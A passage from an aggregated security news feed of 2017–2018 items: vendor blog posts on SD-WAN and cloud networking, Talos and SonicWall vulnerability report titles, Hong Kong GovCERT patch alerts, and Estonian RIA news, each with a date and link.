On February 28, Akamai recorded a 1.35 Tbps DDoS attack against one of our customers. The attack was driven by a relatively new vector, memcached reflection. Possibly the largest publicly disclosed DDoS attack to date, the memcached attack was more than twice the size of the largest DDoS attacks that were launched against an Akamai customer by the operators of the Mirai botnet in September of 2016.

https://www.akamai.com/blog/security/your-cache-exposed
Humphreys Replaces SD-WAN Appliances with Cato Cloud
2018-02-26T12:25:13Z | 1519647913

When Humphreys & Partners Architects, an architectural services firm, needed to open an office in Uruguay, the Dallas-based firm faced a problem all too familiar to MPLS buyers — the high cost and inflexibility of MPLS.   The company’s MPLS network already connected the Dallas headquarters with offices in New Orleans, Garland, Texas, and Toronto.... The post Humphreys Replaces SD-WAN Appliances with Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/humphreys-replaces-sd-wan-appliances-with-cato-cloud/
Adobe Acrobat Reader DC Document ID Remote Code Execution Vulnerability
2018-02-23T00:00:00Z | 1519344000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0505
How to improve mobile access to AWS, Office 365, and the rest of the cloud
2018-02-22T08:35:38Z | 1519288538

Not so long ago, an “android” meant “robot,” and our applications lived in physical datacenters. Mobile access, I mean “remote access,” was an afterthought. Those users who would “telecommute” suffered with multiple identities — one for the road and one for the office. As mobility and the cloud have become the norm, thinking of them... The post How to improve mobile access to AWS, Office 365, and the rest of the cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-improve-mobile-access-to-aws-office-365-and-the-rest-of-the-cloud/
RIA tellitud krüptouuring annab ülevaate krüptograafia hetkeseisust
2018-02-19T22:00:00Z | 1519077600

Riigi Infosüsteemi Amet tellis aasta lõpus AS Cybernetica teadlastelt krüptograafiliste algoritmide uuringu, mis keskendub kolmele põhiteemale nagu krüptoalgoritmide hetkeseis, ID-kaardi intsidendi kirjeldus ning plokiahelate kui rakenduskrüptograafia ülevaade.

https://ria.ee/uudised/ria-tellitud-kruptouuring-annab-ulevaate-kruptograafia-hetkeseisust
WAN Architecture Webinar: How Will You Transform Your WAN in 2018?
2018-02-19T10:39:20Z | 1519036760

During our recent webinar, “The 2018 Guide to WAN Architecture and Design,” many of you participated in a spot survey and asked some excellent questions. We promised to share the results of that research and address as many questions as possible, so let’s get to it. For those who might have missed the webinar, we... The post WAN Architecture Webinar: How Will You Transform Your WAN in 2018? appeared first on Cato Networks.

https://www.catonetworks.com/blog/wan-architecture-webinar-how-will-you-transform-your-wan-in-2018/
How One IT Manager Deployed Sites in Minutes and Cut Costs by 10%
2018-02-14T04:14:54Z | 1518581694

It’s become almost cliche to talk about how SD-WAN improves IT “agility”, but not for one IT manager at a security software company that asked to remain anonymous. He learned firsthand how much cloud-based SD-WAN services can improve IT agility — and turn you into an IT hero. The company wanted to expand their development... The post How One IT Manager Deployed Sites in Minutes and Cut Costs by 10% appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-one-it-manager-deployed-sites-in-minutes-cut-costs-by-10-and-with-cato-cloud/
Security Alert (A18-02-03): Multiple Vulnerabilities in Microsoft Products (February 2018)
2018-02-14T04:00:00Z | 1518580800

Microsoft has released 32 security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-02-04): Multiple Vulnerabilities in Adobe Reader/Acrobat
2018-02-14T04:00:00Z | 1518580800

Security updates are released for Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
What’s Really the Best Approach for Replacing MPLS Connectivity?
2018-02-12T10:11:51Z | 1518430311

It’s no secret that the legacy WAN faces many challenges adapting to today’s business, the big question is: What’s going to replace MPLS? SD-WAN appliances are the obvious answer, but not necessarily the best one. Legacy WAN architectures based on MPLS services provide predictable performance between offices, but they’re not implemented in a way that... The post What’s Really the Best Approach for Replacing MPLS Connectivity? appeared first on Cato Networks.

https://www.catonetworks.com/blog/whats-really-the-best-approach-for-replacing-mpls-connectivity/
Parity Technologies engages Trail of Bits
2018-02-09T12:50:46Z | 1518180646

We’re helping Parity Technologies secure their Ethereum client. We’ll begin by auditing their codebase, and look forward to publishing results and the knowledge we gained in the future. Parity Technologies combines cryptography, cellular systems, peer-to-peer technology and decentralized consensus to solve the problems that have gone unaddressed by conventional server-client architecture. Their Ethereum client is designed for […]

https://blog.trailofbits.com/2018/02/09/parity-technologies-engages-trail-of-bits/
Eesti on tehniliselt valmis vahetama X-tee kaudu andmeid Soomega
2018-02-09T11:16:04Z | 1518174964

Sel nädalal valmis tehniline lahendus, mis võimaldab andmete vahetamist Eesti ja Soome vahel X-tee kaudu.

https://ria.ee/uudised/eesti-tehniliselt-valmis-vahetama-x-tee-kaudu-andmeid-soomega
Security Alert (A18-02-02): Multiple Vulnerabilities in IBM Notes
2018-02-09T04:00:00Z | 1518148800

Multiple vulnerabilities are found in IBM Lotus Notes System Debugger (NSD).

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A18-02-01): Multiple Vulnerabilities in Adobe Flash Player
2018-02-07T04:00:00Z | 1517976000

Adobe has released a security update to address vulnerabilities found in the Adobe Flash Player. Reports indicate that one of the vulnerabilities is being exploited in the wild against Windows users.

https://www.govcert.gov.hk/en/alerts_detail.php
Top 15 Enterprise Networking Experts To Follow
2018-02-05T14:06:12Z | 1517839572

These guys are on the frontline of network architecture and working to educate the world about the changing landscape of enterprise network technology. The list includes people from across the spectrum including analysts, researchers, independent consultants and IT pros. Andrew Lerner (Gartner) (@fast_lerner) Andrew is a Gartner guru specializing in enterprise networking. He focuses his... The post Top 15 Enterprise Networking Experts To Follow appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-15-enterprise-networking-experts-to-follow/
Cisco ASA CVE-2018-0101 Vulnerability: Another Reason To Drop-the-Box
2018-02-01T13:00:19Z | 1517490019

The severe vulnerability Cisco reported in its Cisco Adaptive Security Appliance (ASA) Software has generated widespread outcry and frustration from IT managers across the industry. While Cato generally does not generally discusses security bugs in other vendor products, this vulnerability demonstrates why the appliance-centric way of delivering network security is all but obsolete. When a... The post Cisco ASA CVE-2018-0101 Vulnerability: Another Reason To Drop-the-Box appeared first on Cato Networks.

https://www.catonetworks.com/blog/cisco-asa-cve-2018-0101-vulnerability-another-reason-to-drop-the-box/
2018: Is Your WAN Ready?
2018-01-31T08:01:57Z | 1517385717

It’s no secret. Regular readers of this blog know all too well what enterprises of all sizes are recognizing: the inefficiencies of legacy Wide Area Networks (WANs) making it difficult for many IT leaders to meet the needs of today’s business.   Globalization, the move to cloud datacenter and applications, the increases in velocity of... The post 2018: Is Your WAN Ready? appeared first on Cato Networks.

https://www.catonetworks.com/blog/2018-is-your-wan-ready/
An accessible overview of Meltdown and Spectre, Part 1
2018-01-30T12:50:39Z | 1517316639

In the past few weeks the details of two critical design flaws in modern processors were finally revealed to the public. Much has been written about the impact of Meltdown and Spectre, but there is scant detail about what these attacks are and how they work. We are going to try our best to fix […]

https://blog.trailofbits.com/2018/01/30/an-accessible-overview-of-meltdown-and-spectre-part-1/
Security Alert (A18-01-14): Vulnerability in Cisco Products
2018-01-30T04:00:00Z | 1517284800

Cisco has released the security advisory to address a vulnerability in Cisco ASA software with the webvpn feature enabled.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-01-15): Vulnerability in Firefox
2018-01-30T04:00:00Z | 1517284800

Mozilla has published a security advisory to address a browser user interface (UI) vulnerability found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
The Crypto Mining Threat: The Security Risk Posed By Bitcoin and What You Can Do About It
2018-01-29T12:30:21Z | 1517229021

With Bitcoin, and cryptocurrencies in general, growing in popularity, many customers have asked Cato Research Labs about Bitcoin security risks posed to their networks. Cato Research Labs examined crypto mining and the threats posed to the enterprise. While immediate disruption of the network or loss of data is unlikely to be a direct outcome of... The post The Crypto Mining Threat: The Security Risk Posed By Bitcoin and What You Can Do About It appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-crypto-mining-threat/
coTURN Administrator Web Portal SQL injection vulnerability
2018-01-29T00:00:00Z | 1517184000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0730
coTURN server unsafe telnet admin portal default configuration vulnerability
2018-01-29T00:00:00Z | 1517184000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0733
coTURN TURN server unsafe loopback forwarding default configuration vulnerability
2018-01-29T00:00:00Z | 1517184000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0732
Walt Disney Per-Face Texture Mapping faceInfoSize Code Execution Vulnerability
2018-01-26T00:00:00Z | 1516924800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0515
Tänaseks on uuendatud 400 000 ID-kaarti
2018-01-24T10:32:40Z | 1516789960

Jaanuari lõpu seisuga on oma ID-kaardi uuendanud ligikaudu 400 000 inimest. Kauguuendamise kaudu ehk kodust lahkumata ca 300 000 ning Politsei- ja Piirivalveametis, seal hulgas kaubanduskeskustes üles seatud ajutistest teeninduspunktides ligi 100 000 inimest.

https://ria.ee/uudised/tanaseks-uuendatud-400-000-id-kaarti
Security Alert (A18-01-12): Multiple Vulnerabilities in Apple iOS
2018-01-24T04:00:00Z | 1516766400

Apple released security updates in its latest iOS version 11.2.5 to fix 13 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-01-13): Multiple Vulnerabilities in Firefox
2018-01-24T04:00:00Z | 1516766400

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Heavy lifting with McSema 2.0
2018-01-23T12:50:03Z | 1516711803

Four years ago, we released McSema, our x86 to LLVM bitcode binary translator. Since then, it has stretched and flexed; we added x86-64 support, put it on a performance-focused diet, and improved its usability and documentation. McSema wasn’t the only thing improving these past years, though. At the same time, programs were increasingly adopting modern […]

https://blog.trailofbits.com/2018/01/23/heavy-lifting-with-mcsema-2-0/
RIA vahendab avaliku sektori asutustele ajatempliteenust
2018-01-22T22:00:00Z | 1516658400

RIA on käivitanud avaliku sektori asutuste jaoks ajatempli vahendamise teenuse. Ajatempli teenust on vaja kasutada eelkõige ASiC-e formaadis digitaalallkirjade andmisel ning TeRa rakendusega vanemate digitaalallkirja formaatide üle tembeldamiseks.

https://ria.ee/uudised/ria-vahendab-avaliku-sektori-asutustele-ajatempliteenust
Leptonica gplotMakeOutput Command Injection Vulnerability
2018-01-22T00:00:00Z | 1516579200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0516
RIA peadirektori asetäitja on Uku Särekanno
2018-01-21T22:00:00Z | 1516572000

Riigi Infosüsteemi Ameti küberturvalisuse teenistuse juhina ning peadirektori ühe asetäitjana alustas tööd Uku Särekanno.

https://ria.ee/uudised/ria-peadirektori-asetaitja-uku-sarekanno
Advisory: Why You Should (Still) Care About Inbound Network Scans
2018-01-17T09:02:01Z | 1516179721

In the light of recent ransomware attack campaigns against Microsoft RDP servers, Cato Research assessed the risk network scanning poses to organizations. Although well researched, many organizations continue to be exposed to this attack technique. Here’s what you can (and should) do to protect your organization. What is Network Scanning? Network scanning is a process... The post Advisory: Why You Should (Still) Care About Inbound Network Scans appeared first on Cato Networks.

https://www.catonetworks.com/blog/advisory-why-you-should-still-care-about-inbound-network-scans/
Security Alert (A18-01-10): Multiple Vulnerabilities in Oracle Java and Oracle Products (January 2018)
2018-01-17T04:00:00Z | 1516161600

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products. Patches are also available for some products to address the Meltdown and Spectre issues.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-01-11): Vulnerability in ISC BIND
2018-01-17T04:00:00Z | 1516161600

A vulnerability was found in the ISC BIND software.

https://www.govcert.gov.hk/en/alerts_detail.php
Tinysvcmdns Multi-label DNS mdns_parse_qn Denial Of Service Vulnerability
2018-01-17T00:00:00Z | 1516147200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0486
Riik tugevdab IT-alast koostööd teadus- ja eraettevõtetega
2018-01-16T22:00:00Z | 1516140000

Riik ja infoturbeettevõtted ühendasid jõud ning kirjutasid alla infoturbe kompetentsikeskuse koostööleppele, et viia teadus- ning riigiasutuste vaheline koostöö ametlikule tasemele.

https://ria.ee/uudised/riik-tugevdab-it-alast-koostood-teadus-ja-eraettevotetega
SonicWall Global Management System (GMS) 8.1 cross-site scripting
2018-01-14T04:29:00Z | 1515904140

SonicWall Global Management System (GMS) 8.1 has XSS via the `newName` and `Name` values of the `/sgms/TreeControl` module. CVE: CVE-2018-5691 Last updated: March 12, 2018, 5:31 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0003
Security Alert (A18-01-09): Multiple Vulnerabilities in Hypervisors
2018-01-12T04:00:00Z | 1515729600

The recent disclosed security issues, known as Meltdown and Spectre, affects most hypervisors in a virtualised environment.

https://www.govcert.gov.hk/en/alerts_detail.php
Blender modifier_mdef_compact_influences Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0453
Blender Sequencer imb_get_anim_type Streams Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0413
Blender Object CustomData_external_read Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0434
Blender BKE_curve_bevelList_make Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0454
Blender customData_add_layer__internal Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0451
Blender Directory Browsing Thumbnail Viewer Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0415
Blender Sequencer imb_loadtiff Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0406
Blender Sequencer avi_format_convert Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0414
Blender vcol_to_fcol Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0433
Blender BKE_vfont_to_curve_ex Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0455
Blender Sequencer dpxOpen Buffer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0409
Blender Sequencer imb_loadpng Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0407
Blender Sequencer imb_loadhdr Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0411
Blender Sequencer imb_load_dpx_cineon Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0410
Blender Sequencer imb_loadiris Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0408
Blender BKE_image_acquire_ibuf Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0425
Blender BKE_mesh_calc_normals_tessface Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0438
Blender Sequencer imb_bmp_decode Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0412
Blender multires_load_old_dm base vertex map Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0452
Blender mesh_calc_modifiers eModifierTypeType_OnlyDeform Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0457
Blender draw_new_particle_system PART_DRAW_AXIS Integer Overflow Code Execution Vulnerability
2018-01-11T00:00:00Z | 1515628800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0456
High Threat Security Alert (A18-01-07): Multiple Vulnerabilities in Microsoft Products (January 2018)
2018-01-10T04:00:00Z | 1515556800

Users are advised to take immediate action to patch the affected systems, especially for those installed with Microsoft Office, since exploitation has been reported in the wild.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-01-08): Vulnerability in Adobe Flash Player
2018-01-10T04:00:00Z | 1515556800

Adobe released a security update to address a vulnerability found in the Adobe Flash Player.

https://www.govcert.gov.hk/en/alerts_detail.php
rails_admin rails gem XSS vulnerability
2018-01-10T00:00:00Z | 1515542400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0450
delayed_job_web rails gem XSS vulnerability
2018-01-10T00:00:00Z | 1515542400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0449
The 2018 WAN Survey: Helping Us, Help You
2018-01-09T17:07:40Z | 1515517660

What will 2018 bring for networking? Help us find out and participate in our recently launched “2018 State of the WAN” survey. You can see the survey here. The survey seeks to understand the state of the today’s business networks. We look at general networking and security trends impacting business. We dig into the drivers... The post The 2018 WAN Survey: Helping Us, Help You appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-2018-wan-survey-helping-us-help-you/
The Meltdown-Spectre Exploits: Lock-down your Servers, Update Cloud Instances
2018-01-09T11:51:40Z | 1515498700

The much publicized critical CPU vulnerabilities published last week by Google’s Project Zero and its partners, will have their greatest impact on virtual hosts or those servers where threat actors can gain physical access. The vulnerabilities, named Meltdown and Spectre, are hardware bugs that can be abused to leak information from one process to another... The post The Meltdown-Spectre Exploits: Lock-down your Servers, Update Cloud Instances appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-meltdown-spectre-exploits-lock-down-your-servers-update-cloud-instances/
High Threat Security Alert (A18-01-05): Multiple Vulnerabilities in Linux/Unix Operating Systems
2018-01-09T04:00:00Z | 1515470400

Users are advised to take immediate action to patch the affected Linux/Unix systems to address the well-known Meltdown and Spectre CPU issues with elevated risks.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A18-01-06): Multiple Vulnerabilities in Apple iOS
2018-01-09T04:00:00Z | 1515470400

Users are advised to take immediate action to patch the affected iOS devices to address the well-known Spectre CPU issues with elevated risks.

https://www.govcert.gov.hk/en/alerts_detail.php
Parity Ethereum Client Overly Permissive Cross-domain Whitelist JSON-RPC vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0508
CPP-Ethereum JSON-RPC miner_setGasPrice improper authorization Vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0468
CPP-Ethereum JSON-RPC miner_setEtherbase improper authorization Vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0467
CPP-Ethereum libevm pow2N Code Execution Vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0500
CPP-Ethereum JSON-RPC Denial Of Service Vulnerabilities
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0471
CPP-Ethereum JSON-RPC miner_stop improper authorization Vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0470
CPP-Ethereum JSON-RPC miner_start improper authorization Vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0469
CPP-Ethereum JSON-RPC admin_nodeInfo improper authorization Vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0465
CPP-Ethereum libevm create2 Information Leak Vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0503
CPP-Ethereum JSON-RPC admin_peers improper authorization Vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0466
CPP-Ethereum JSON-RPC admin_addPeer Authorization Bypass Vulnerability
2018-01-09T00:00:00Z | 1515456000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0464
Dell SonicWall SonicOS NSA CVE-2018-5280 HTML Injection Vulnerability
2018-01-08T09:29:00Z | 1515403740

SonicWall SonicOS on Network Security Appliance (NSA) 2016 Q4 devices has XSS via the Configure SSO screens. CVE: CVE-2018-5280 Last updated: Jan. 30, 2018, 4:04 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0001
Dell SonicWall SonicOS NSA CVE-2018-5281 Multiple HTML Injection Vulnerabilities
2018-01-08T09:29:00Z | 1515403740

SonicWall SonicOS on Network Security Appliance (NSA) 2017 Q4 devices has XSS via the CFS Custom Category and Cloud AV DB Exclusion Settings screens. CVE: CVE-2018-5281 Last updated: Jan. 30, 2018, 4:12 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0002
High Threat Security Alert (A18-01-04): Multiple Vulnerabilities in Browsers
2018-01-08T04:00:00Z | 1515384000

Major browser vendors have published security advisories to address vulnerabilities. Users are advised to take immediate action to patch the affected browsers to address the well-known Meltdown and Spectre CPU issues with elevated risks.

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST at the Global Conference on Cyberspace (GCCS)
2018-01-06T10:00:00Z | 1515232800

An overview of the Global Conference on Cyberspace, and the work FIRST does in the policy community.

https://www.first.org/blog/20180106-FIRST_at_the_GCCS
High Threat Security Alert (A18-01-03): Multiple Vulnerabilities in Microsoft Products
2018-01-04T04:00:00Z | 1515038400

Microsoft has released 18 security updates addressing multiple vulnerabilities which affect several Microsoft products or components. Users are advised to take immediate action to patch the affected systems since there is elevated risk of cyber attacks for the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
How to Choose the Most Suitable Network Technology for Your Company
2018-01-03T09:33:41Z | 1514972021

Twentieth century biochemist and science fiction writer Isaac Asimov claims, “No sensible decision can be made any longer without taking into account not only the world as it is, but the world as it will be.” And perhaps nowhere in his statement holds more true than in the world of network technologies. The idea of... The post How to Choose the Most Suitable Network Technology for Your Company appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-choose-the-most-suitable-network-technology-for-your-company/
Security Alert (A18-01-01): Multiple Vulnerabilities in VMware vSphere Data Protection
2018-01-03T04:00:00Z | 1514952000

VMware has published a security advisory to address multiple vulnerabilities found in VMware vSphere Data Protection (VDP) version 5.x, 6.0.x, 6.1.x.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-01-02): Vulnerability in phpMyAdmin
2018-01-03T04:00:00Z | 1514952000

A Cross Site Request Forgery (CSRF) vulnerability has been found in phpMyAdmin version prior to 4.7.7.

https://www.govcert.gov.hk/en/alerts_detail.php
The Cato “Why”: Make IT easy
2017-12-28T08:32:44Z | 1514449964

Why do we do what we do? In a 2009 iconic TED talk, Simon Sinek explained that most people know what they do, some know how they do it, but it is why they do it that actually matters. What is the belief, the cause, the passion that drives them. It is “the why” that... The post The Cato “Why”: Make IT easy appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-cato-why-make-it-easy/
Videos from Ethereum-focused Empire Hacking
2017-12-22T12:50:57Z | 1513947057

On December 12, over 150 attendees learned how to write and hack secure smart contracts at the final Empire Hacking meetup of 2017. Thank you to everyone who came, to our superb speakers, and to Datadog for hosting this meetup at their office. Watch the presentations again We believe strongly that the community should share […]

https://blog.trailofbits.com/2017/12/22/videos-from-ethereum-focused-empire-hacking/
Pooled peatatud sertifikaatidega ID-kaartidest on uuendatud
2017-12-22T10:34:13Z | 1513938853

Tänaseks on oma ID-kaardi uuendanud 352 000 inimest, mis on pea pool kõigist peatatud sertifikaatidega dokumentidest.

https://ria.ee/uudised/pooled-peatatud-sertifikaatidega-id-kaartidest-uuendatud
What are the current pain points of osquery?
2017-12-21T12:50:08Z | 1513860608

You’re reading the second post in our four-part series about osquery. Read post number one for a snapshot of the tool’s current use, the reasons for its growing popularity among enterprise security teams, and how it stacks up against commercial alternatives. osquery shows considerable potential to revolutionize the endpoint monitoring market. (For example, it greatly […]

https://blog.trailofbits.com/2017/12/21/osquery-pain-points/
Why Cloud Networking Is The Future Of Global Connectivity
2017-12-20T11:22:30Z | 1513768950

Today’s businesses have vastly different internet connectivity requirements than those from even just a few years ago. In global markets, finding a way to achieve a safe, reliable network connection has become critical for any business looking to stay relevant, competitive, and secure. But current options leave much to be desired. MPLS networks: pros and... The post Why Cloud Networking Is The Future Of Global Connectivity appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-cloud-networking-is-the-future-of-global-connectivity/
VMware VNC Pointer Decode Code Execution Vulnerability
2017-12-19T00:00:00Z | 1513641600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0369
VMware VNC Dynamic Resolution Request Code Execution Vulnerability
2017-12-19T00:00:00Z | 1513641600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0368
Tumeveebis avaldati 1,4 miljardi kasutaja paroolide seas ka Eesti inimeste paroolid
2017-12-14T22:00:00Z | 1513288800

Hiljuti avastati Tumeveebist andmebaas, mis sisaldas 1,4 miljardi kasutaja infot ja parooli avateksti kujul ehk hõlpsasti loetavana. Andmebaasis leidus ka enam kui 190 000 .ee domeeniga meiliaadressi.

https://ria.ee/uudised/tumeveebis-avaldati-14-miljardi-kasutaja-paroolide-seas-ka-eesti-inimeste-paroolid
Announcing the Trail of Bits osquery extension repository
2017-12-14T13:51:41Z | 1513259501

Today, we are releasing access to our maintained repository of osquery extensions. Our first extension takes advantage of the Duo Labs EFIgy API to determine if the EFI firmware on your Mac fleet is up to date. There are very few examples of publicly released osquery extensions. Very little documentation exists on the topic. This […]

https://blog.trailofbits.com/2017/12/14/announcing-the-trail-of-bits-osquery-extension-repository/
Firewall Bursting: A New Approach to Scaling Firewalls
2017-12-14T08:49:57Z | 1513241397

The growing amount of encrypted traffic coupled with the security appliances’ limited processing power is forcing enterprises to reevaluate their branch firewalls. The appliances simply lack the capacity to execute the wide range of security functions, such as next-generation firewall (NGFW) and IPS, needed to protect the branch. Organizations face a range of architectural choices:... The post Firewall Bursting: A New Approach to Scaling Firewalls appeared first on Cato Networks.

https://www.catonetworks.com/blog/firewall-busting-a-new-approach-to-scaling-firewalls/
Security Alert (A17-12-07): Multiple Vulnerabilities in Microsoft Products (December 2017)
2017-12-13T04:00:00Z | 1513137600

Microsoft has released 23 security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-12-08): Vulnerability in Adobe Flash Player
2017-12-13T04:00:00Z | 1513137600

Adobe released a security update to address a vulnerability found in the Adobe Flash Player.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-12-09): Vulnerability in TLS RSA Cipher Suites
2017-12-13T04:00:00Z | 1513137600

A vulnerability is found in the implementation of TLS network security protocol affecting those TLS servers with RSA cipher suites enabled.

https://www.govcert.gov.hk/en/alerts_detail.php
Security, Incident Response, Privacy and Data Protection
2017-12-11T13:00:00Z | 1512997200

EUrope is in the course of introducing completely new legisaltion regulation privacy and data protection. Much of the data that CSIRTs use potentially is affected by this.

https://www.first.org/blog/20171211_GDPR_for_CSIRTs
Security Alert (A17-12-06): Vulnerability in Hewlett-Packard (HP) Products
2017-12-11T04:00:00Z | 1512964800

HP released a security update to fix a vulnerability identified in certain versions of Synaptics touchpad drivers used by some models of HP products

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-12-05): Multiple Vulnerabilities in Firefox
2017-12-08T04:00:00Z | 1512705600

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
ACDSee Ultimate 10 IDE_PSD PSD Parsing Code Execution Vulnerability
2017-12-08T00:00:00Z | 1512691200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0393
Security Alert (A17-12-03): Vulnerability in Microsoft Malware Protection Engine
2017-12-07T04:00:00Z | 1512619200

Microsoft has released a security update addressing a vulnerability in the Microsoft Malware Protection Engine.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-12-04): Multiple Vulnerabilities in Apple iOS
2017-12-07T04:00:00Z | 1512619200

On 2 December 2017, Apple released security updates in its latest iOS version 11.2 to fix 14 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
AWS, Azure, or Google Cloud Platform? How Scenario Analysis Simplifies Choosing the Right Cloud Provider
2017-12-05T14:42:58Z | 1512484978

With revenues projected to reach $246.8b in 2017 (up 18% on the year before), the public cloud is big business. The biggest IaaS providers, Amazon Web Services, Microsoft Azure, Google Cloud Platform, all offering deals to attract customers. But figuring out which service is right for you isn’t going to be simple. Cloud services have... The post AWS, Azure, or Google Cloud Platform? How Scenario Analysis Simplifies Choosing the Right Cloud Provider appeared first on Cato Networks.

https://www.catonetworks.com/blog/aws-azure-or-google-cloud-platform-how-scenario-analysis-simplifies-choosing-the-right-cloud-provider/
Security Alert (A17-12-02): Multiple Vulnerabilities in Firefox
2017-12-05T04:00:00Z | 1512446400

Mozilla has published a security advisory to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Beware of PerformanceTiming.domInteractive
